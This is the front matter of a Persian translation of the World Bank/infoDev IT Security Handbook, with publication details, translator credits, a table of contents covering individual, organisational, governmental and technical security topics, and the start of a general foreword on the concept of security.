‫ﺭﺍﻫﻨﻤﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺗﺄﻟﻴﻒ‪:‬‬
‫ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳـﻜﺎﻱ‬
‫ﺟﻴﻤﺰ ﺍﻛﺲ‪ .‬ﺩﻣﭙﺰﻱ‬
‫ﺁﻟـﻦ ﮔﺮﻳﻦﺑﺮﮒ‬
‫ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ‪ .‬ﻣﻚ‬
‫ﺁﻟـﻦ ﺷﻮﺍﺭﺗﺰ‬
‫ﺗﺮﺟﻤﺔ‪:‬‬
‫ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ‬
‫ﺯﻫــﺮﺍ ﺷﺠــﺎﻋﻲ‬
‫ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ‬
‫ﺩﺑﻴﺮﺧﺎﻧﻪ‬
‫ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‬
‫ﺗﻴﺮﻣﺎﻩ ‪۱۳۸۴‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ = ‪ / IT Security Handbook‬ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ ‪] ...‬ﻭ ﺩﻳﮕﺮﺍﻥ[؛ ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ ﻣﻬﺪﻱ‬
‫ﻣﻴﺮﺩﺍﻣﺎﺩﻱ‪ ،‬ﺯﻫﺮﺍ ﺷﺠﺎﻋﻲ‪ ،‬ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ‪ -- .‬ﺗﻬﺮﺍﻥ‪ ،‬ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‪ ،‬ﺩﺑﻴﺮﺧﺎﻧﻪ‪.۱۳۸۴ ،‬‬
‫‪ ۵۰۹‬ﺹ‪:.‬ﺟﺪﻭﻝ‪ ۵۰،۰۰۰ .‬ﺭﻳﺎﻝ‬
‫‪ISBN: 964-8846-26-x‬‬
‫ﻋﻨﻮﺍﻥ ﺑﻪ ﺍﻧﮕﻠﻴﺴﻲ‪:‬‬
‫‪IT Security Handbook‬‬
‫ﻓﻬﺮﺳﺘﻨﻮﻳﺴﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻓﻴﭙﺎ‪.‬‬
‫ﮐﺘﺎﺑﻨﺎﻣﻪ‪ :‬ﺹ‪۵۰۹ .‬؛ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺻﻮﺭﺕ ﺯﻳﺮﻧﻮﻳﺲ‪ .‬ﻧﻤﺎﻳﻪ‪.‬‬
‫‪ .۱‬ﺗﮑﻨﻮﻟﻮﮊﻱ ﺍﻃﻼﻋﺎﺕ ‪ --‬ﺍﻗﺪﺍﻣﺎﺕ ﺗﺄﻣﻴﻨﻲ‪ .‬ﺍﻟﻒ‪ .‬ﺳﺎﺩﻭﺳﮑﺎﻱ‪ ،‬ﺟﻮﺭﺝ‪ .Sadowsky ،George ،‬ﺏ‪.‬ﻣﻴﺮﺩﺍﻣﺎﺩﻱ‪ ،‬ﻣﻬﺪﻱ ‪ ،- - ۱۳۵۹ -‬ﻣﺘﺮﺟﻢ‪.‬‬
‫ﺝ‪.‬ﺷﺠﺎﻋﻲ‪ ،‬ﺯﻫﺮﺍ‪ ،‬ﻣﺘﺮﺟﻢ‪ .‬ﺩ‪.‬ﺻﻤﺪﻱ‪ ،‬ﻣﺤﻤﺪﺟﻮﺍﺩ‪ ،‬ﻣﺘﺮﺟﻢ‪ .‬ﻫـ ‪.‬ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‪ .‬ﺩﺑﻴﺮﺧﺎﻧﻪ‪ .‬ﻭ‪.‬ﻋﻨﻮﺍﻥ‪.‬‬
‫‪۲۳‬ﺭ‪T۵۸/۵/‬‬
‫‪۱۳۸۴‬‬
‫ﮐﺘﺎﺑﺨﺎﻧﻪ ﻣﻠﻲ ﺍﻳﺮﺍﻥ‬
‫‪۳۰۳/۴۸۳۳‬‬
‫‪۸۴-۱۷۵۲۵‬ﻡ‬
‫ﺍﻳﻦ ﮐﺘﺎﺏ ﺗﺮﺟﻤﻪﺍﻱ ﺍﺳﺖ ﺍﺯ‪:‬‬
‫;‪George Sadowsky; James X. Dempsey; Alan Greenberg; Barbara J. Mack‬‬
‫‪Alan Schwartz; IT Security Handbook; infoDev, Worldbank; 2003.‬‬
‫)‪(ISBN: 964-03-9951-5; http://www.infodev-security.net/handbook‬‬
‫ﺭﺍﻫﻨﻤـﺎﻱ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫© ﺣﻖ ﭼﺎﭖ‪ ۱۳۸۳ :‬ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‬
‫ﻣﺆﻟﻔﻴﻦ‪ :‬ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ‪ ،‬ﺟﻴﻤﺰ ﺍﮐﺲ‪ .‬ﺩﻣﭙﺰﻱ‪ ،‬ﺁﻟﻦ ﮔﺮﻳﻦﺑﺮﮒ‪ ،‬ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ‪ .‬ﻣﮏ‪ ،‬ﺁﻟﻦ ﺷﻮﺍﺭﺗﺰ‬
‫ﮔـﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ‪ :‬ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ )‪([email protected]‬‬
‫ﺯﻫــﺮﺍ ﺷﺠــﺎﻋـﻲ )‪([email protected]‬‬
‫ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ )‪([email protected]‬‬
‫ﻭﻳـﺮﺍﻳﺶ ﻓﻨـﻲ‪ :‬ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ‬
‫ﺻﻔﺤـﻪﺁﺭﺍﻳﻲ ﻭ ﻧﺴﺨـﻪﭘﺮﺩﺍﺯﻱ‪ :‬ﻣـﺎﺭﻳـــﺎ ﻗــﺎﺩﺭﻱ )‪([email protected]‬‬
‫ﻟﻴﺘﻮﮔﺮﺍﻓﻲ‪ ،‬ﭼﺎﭖ ﻭ ﺻﺤﺎﻓﻲ‪ :‬ﺷﺮﮐﺖ ﺍﻧﺘﺸﺎﺭﺍﺕ ﮔﻞﻭﺍﮊﻩ‬
‫ﻧﺎﻇﺮ ﭼﺎﭖ‪ :‬ﺳﻌﻴﺪ ﺯﺭﺍﻋﺘﻲ )‪([email protected]‬‬
‫ﻧﻮﺑﺖ ﭼﺎﭖ‪ :‬ﺍﻭﻝ ‪۱۳۸۴‬‬
‫ﺷﻤـﺎﺭﮔﺎﻥ‪ ۱۵۰۰ :‬ﻧﺴﺨﻪ‬
‫ﺷــﺎﺑـﮏ‪ISBN: 964-8846-26-x / ۹۶۴-۸۸۴۶-۲۶-x :‬‬
‫ﺷﻤﺎﺭﺓ ﭘﻴﺎﭘﻲ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺩﺑﻴﺮﺧﺎﻧﻪ‪۸۴-۱۴ :‬‬
‫ﻗـﻴـﻤـﺖ‪ ۵۰،۰۰۰ :‬ﺭﻳﺎﻝ‬
‫ﻧﺸﺎﻧﻲ ﭘﺴﺘﻲ‪ :‬ﺗﻬﺮﺍﻥ‪ ،‬ﺧﻴﺎﺑﺎﻥ ﺷﺮﻳﻌﺘﻲ‪ ،‬ﻧﺮﺳﻴﺪﻩ ﺑﻪ ﭼﻬﺎﺭﺭﺍﻩ ﺷﻬﻴﺪ ﻗﺪﻭﺳﻲ‪ ،‬ﻧﺒﺶ ﺍﻧﺪﻳﺸﻪ ﻳﻜﻢ‪ ،‬ﺷﻤﺎﺭﺓ ‪۸۰۸‬‬
‫ﺗﻠﻔﻦ‪ ۸۸۴۴۸۰۳۷ :‬ﻭ ‪ ۸۸۴۴۸۰۳۸‬ﻧﻤﺎﺑﺮ‪ ، ۸۸۴۴۸۰۳۸ :‬ﺹ‪.‬ﭖ‪۱۳۱۵ :‬ـ ‪۱۶۳۱۵‬‬
‫ﻧﺸﺎﻧﻲ ﻭﺑﮕﺎﻩ‪http://www.scict.ir :‬‬
‫ﻓﻬﺮﺳﺖ‬
‫ﭘﻴﺶﮔﻔﺘﺎﺭ ‪..............................................................................................................................................................................‬‬
‫ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ ‪..............................................................................................................................................................‬‬
‫ﺩﻳﺒﺎﭼﻪ ‪....................................................................................................................................................................................‬‬
‫ﭘﻴﺶ ﺩﺭﺁﻣﺪ ‪...........................................................................................................................................................................‬‬
‫ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ‪.....................................................................................................................................................................‬‬
‫‪۷‬‬
‫‪۹‬‬
‫‪۱۱‬‬
‫‪۱۳‬‬
‫‪۱۹‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ‪۲۵ .............................................................................................‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ‪..............................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۲‬ﺩﺭﮎ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﺘﻲ ‪................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ ‪..............................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ‪...........................................................................................‬‬
‫ﻓﺼﻞ ‪ .۵‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ‪................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ‪...............................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۷‬ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ‪..................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۸‬ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ‪..................................................................................................................‬‬
‫ﺿﻤﻴﻤﺔ ‪ .۱‬ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪.............................................................................................................‬‬
‫ﺿﻤﻴﻤﺔ ‪................................................................................................................................................. TCP/IP .۲‬‬
‫ﺿﻤﻴﻤﺔ ‪ .۳‬ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ ‪........................................................................................................................‬‬
‫‪۴۵‬‬
‫‪۴۷‬‬
‫‪۴۹‬‬
‫‪۵۵‬‬
‫‪۶۵‬‬
‫‪۷۱‬‬
‫‪۷۹‬‬
‫‪۹۳‬‬
‫‪۹۹‬‬
‫‪۱۰۵‬‬
‫‪۱۱۱‬‬
‫‪۱۱۵‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ‪......................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۲‬ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪.................................................................‬‬
‫ﻓﺼﻞ ‪ .۳‬ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ‪.................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۴‬ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪............................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۵‬ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ ‪.......................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ‪........................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۷‬ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ ‪....................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۸‬ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ‪ ،‬ﺗﺪﻭﻳﻦ ﺁﺋﻴﻦﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪...................................................‬‬
‫ﻓﺼﻞ ‪ .۹‬ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪........................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱۰‬ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪ :‬ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ ‪.....................................................‬‬
‫ﻓﺼﻞ ‪ .۱۱‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ :‬ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ ‪.................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱۲‬ﻗﻮﺍﻋﺪ ﺍﻳﻤﻨﻲ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ ‪...............................................................‬‬
‫ﻓﺼﻞ ‪ .۱۳‬ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ‪.........................................................................................‬‬
‫‪۱۱۹‬‬
‫‪۱۲۱‬‬
‫‪۱۲۷‬‬
‫‪۱۳۷‬‬
‫‪۱۴۵‬‬
‫‪۱۴۹‬‬
‫‪۱۵۹‬‬
‫‪۱۶۷‬‬
‫‪۱۷۵‬‬
‫‪۱۷۹‬‬
‫‪۱۸۵‬‬
‫‪۱۹۷‬‬
‫‪۲۰۵‬‬
‫‪۲۱۵‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ‪..................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۲‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ‪..................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۳‬ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺖ ﺑﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ‪................................................................................‬‬
‫ﻓﺼﻞ ‪ .۴‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ‪.................................................................................................................‬‬
‫‪۲۲۹‬‬
‫‪۲۳۱‬‬
‫‪۲۳۵‬‬
‫‪۲۴۳‬‬
‫‪۲۴۵‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ‪...............................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۲‬ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ‪................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ‪.........................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ‪.......................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۵‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪.......................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪...............................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۷‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ‪............................................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۸‬ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ‪.....................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۹‬ﻛﺸﻒ ﻭ ﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ ‪..............................................................................................................................‬‬
‫ﻓﺼﻞ ‪ .۱۰‬ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ‪..................................................................................................................‬‬
‫‪۲۵۵‬‬
‫‪۲۵۷‬‬
‫‪۲۶۵‬‬
‫‪۲۷۹‬‬
‫‪۲۹۱‬‬
‫‪۳۱۳‬‬
‫‪۳۴۷‬‬
‫‪۳۷۷‬‬
‫‪۴۰۹‬‬
‫‪۴۲۳‬‬
‫‪۴۴۱‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‪ .‬ﭘﻴﻮﺳﺘﻬﺎ ‪........................................................................................................................................................‬‬
‫ﭘﻴﻮﺳﺖ ‪ .۱‬ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ‪................................................................................................................................‬‬
‫ﭘﻴﻮﺳﺖ ‪ .۲‬ﻛﺘﺎﺑﻨﺎﻣﻪ ‪...................................................................................................................................................‬‬
‫ﭘﻴﻮﺳﺖ ‪ .۳‬ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪.....................................................................................................................................‬‬
‫ﭘﻴﻮﺳﺖ ‪ .۴‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪....................................................................................................................................‬‬
‫ﭘﻴﻮﺳﺖ ‪ .۵‬ﻣﻨﺎﺑﻊ ﭼﺎﭘﻲ ‪..............................................................................................................................................‬‬
‫‪۴۵۳‬‬
‫‪۴۵۵‬‬
‫‪۴۶۷‬‬
‫‪۴۷۹‬‬
‫‪۴۸۹‬‬
‫‪۴۹۵‬‬
‫ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ‪۵۰۳ ........................................................................................................................................‬‬
‫ﭘﻴﺶﮔﻔﺘﺎﺭ‬
‫ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺑـﺸﺮ ﺑـﻮﺩﻩ ﻭ ﻫـﺴﺖ‪ .‬ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒـﻞ ﺗـﺎﺭﻳﺦ‪ ،‬ﺍﻣﻨﻴـﺖ‬
‫ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻔﻬﻮﻣﻲ ﺣﻴﺎﺗﻲ ﻭ ﻛﺎﻣ ﹰ‬
‫ﻼ ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﺷﺎﻣﻞ ﻣﻲﺷﺪ ﻛﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔﻆ ﺑﻘﺎ ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧﺎﺕ ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ‬
‫ﻣﻔﻬﻮﻣﻲ ﻛﺎﻣ ﹰ‬
‫ﺗﺄﻣﻴﻦ ﻏﺬﺍ‪ .‬ﺑﺘﺪﺭﻳﺞ ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮﻱ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ ﻭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﻭ ﺍﺳﺘﺮﺍﺣﺖ‬
‫ﺑﺪﻭﻥ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺧﻄﺮ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﭘﻴﺸﻴﻦ ﺑﺸﺮ ﺍﻓﺰﻭﺩﻩ ﺷﺪ‪ .‬ﺑﺎ ﭘﻴـﺸﺮﻓﺖ ﺗﻤـﺪﻥ ﻭ ﺷـﻜﻞﮔﻴـﺮﻱ ﺟﻮﺍﻣـﻊ‪ ،‬ﻣﺤـﺪﻭﺩﺓ ﺍﻣﻨﻴـﺖ ﺍﺑﻌـﺎﺩ ﺑـﺴﻴﺎﺭ‬
‫ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ ﻭ ﺑﺎ ﺗﻔﻜﻴﻚ ﺣﻮﺯﺓ ﺍﻣﻮﺍﻝ ﻭ ﺣﻘﻮﻕ ﺷﺨﺼﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻭ ﺍﺯ ﺍﻣﻮﺍﻝ ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻌﺮﻳﻒ ﻗﻠﻤﺮﻭﻫﺎﻱ ﻣﻠﻲ ﻭ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺑﺘﺪﺭﻳﺞ ﻣﻔﺎﻫﻴﻢ ﻭﺳﻴﻌﻲ ﻣﺎﻧﻨﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﺎﻟﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺳﻴﺎﺳﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺍﻗﺘـﺼﺎﺩﻱ‬
‫ﻼ ﻣﺤﺪﻭﺩ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺸﺮ ﻧﻤﻲﺷﺪﻧﺪ‪ ،‬ﻭﻟﻲ ﻋﻤﺪﺗﹰﺎ ﺗﺤﻘﻖ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﮔﺮﺩﻳﺪ‪ .‬ﺍﻳﻦ ﻣﻔﺎﻫﻴﻢ ﮔﺮﭼﻪ ﺩﻳﮕﺮ ﻛﺎﻣ ﹰ‬
‫ﻣﺴﺘﻠﺰﻡ ﻭﺟﻮﺩ ﻭ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﻴﻂﻫﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻮﺩ‪.‬‬
‫ﻟﻴﻜﻦ ﺟﻬﺎﻥ ﺩﺭ ﺩﻫﻪﻫﺎﻱ ﺍﺧﻴﺮ ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﻋﺮﺻﺔ ﺗﺤﻮﻻﺕ ﭼﺸﻤﮕﻴﺮﻱ ﺑﻮﺩﻩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻨﺎﺳﺒﺎﺕ ﻭ ﻣﻌـﺎﺩﻻﺕ‬
‫ﭘﻴﺸﻴﻦ ﺭﺍ ﺑﻄﻮﺭ ﺍﺳﺎﺳﻲ ﺩﺳﺘﺨﻮﺵ ﺗﻐﻴﻴﺮ ﻧﻤﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺗﺤﻮﻻﺕ ﻛﻪ ﺑﺎ ﻣﺤﻮﺭﻳﺖ ﻛـﺎﺭﺑﺮﻱ ﻭﺳـﻴﻊ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺷﺪﻩ‪ ،‬ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﺧﻮﺩﻛﺎﺭﺳﺎﺯﻱ )‪ (Automation‬ﻭ ﺍﻓﺰﺍﻳﺶ ﺑﻬﺮﻩﻭﺭﻱ ﺁﻏـﺎﺯ ﮔﺮﺩﻳـﺪﻩ ﻭ ﺍﻛﻨـﻮﻥ ﺑـﺎ ﺗﻜﺎﻣـﻞ‬
‫ﻼ ﺯﻧﺪﮔﻲ ﻓﺮﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺸﺮ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ‪ .‬ﺑـﻪ‬
‫ﻛﺎﺭﺑﺮﻱ ﺁﻥ ﺩﺭ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﻫﻢﺍﻓﺰﺍﺋﻲ ﻣﺸﺎﺭﻛﺘﻲ )‪ ،(Collaboration‬ﻋﻤ ﹰ‬
